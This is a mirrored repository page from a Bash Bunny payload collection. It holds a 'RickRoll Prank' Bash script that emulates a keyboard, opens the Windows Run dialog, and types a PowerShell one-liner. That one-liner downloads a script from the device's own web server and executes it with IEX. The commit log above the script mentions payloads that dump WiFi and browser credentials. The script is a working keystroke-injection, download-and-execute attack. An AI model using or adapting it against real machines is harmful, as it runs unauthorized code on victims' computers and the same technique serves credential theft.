mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Initial commit HID Powershell attack to dump WiFiCreds * Update readme.md * changed initial LED blink color to white * Changed initial LED color to white * Changed initial LED Color to white * swapped sync before LED * switched from powershell to batch * Update payload.txt * using powershell again , updated version and LEDs * using powershell, added usb eject, Win 7,8,10 * added window resizing to hide payload typing * Update payload.txt * pull request * BrowserCreds Pull * separate powershell script called from payload also added result detection * update LEDs * Update payload.txt * initial commit * Update payload.txt * initial pull * initial commit
35 lines
927 B
Bash
35 lines
927 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: RickRoll Prank
|
|
# Author: illwill
|
|
# Version: 0.1
|
|
#
|
|
#
|
|
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
|
|
# Blue...............Running Powershell / Waiting for WebServer to start
|
|
# White..............WebServer started starting the rickroll
|
|
# Green..............RickRoll Started, Safe to pull
|
|
|
|
|
|
LED B 200
|
|
ATTACKMODE HID
|
|
Q GUI r
|
|
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
|
|
Q DELAY 300
|
|
Q ENTER
|
|
|
|
|
|
ATTACKMODE RNDIS_ETHERNET
|
|
source bunny_helpers.sh
|
|
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
|
|
cd $payload_dir
|
|
LED R G B 200
|
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
|
python -m SimpleHTTPServer 80 &
|
|
pid=$!
|
|
while ! nc -z localhost 80; do sleep 0.2; done
|
|
sleep 3
|
|
LED G 200
|
|
kill -9 $pid
|
|
exit
|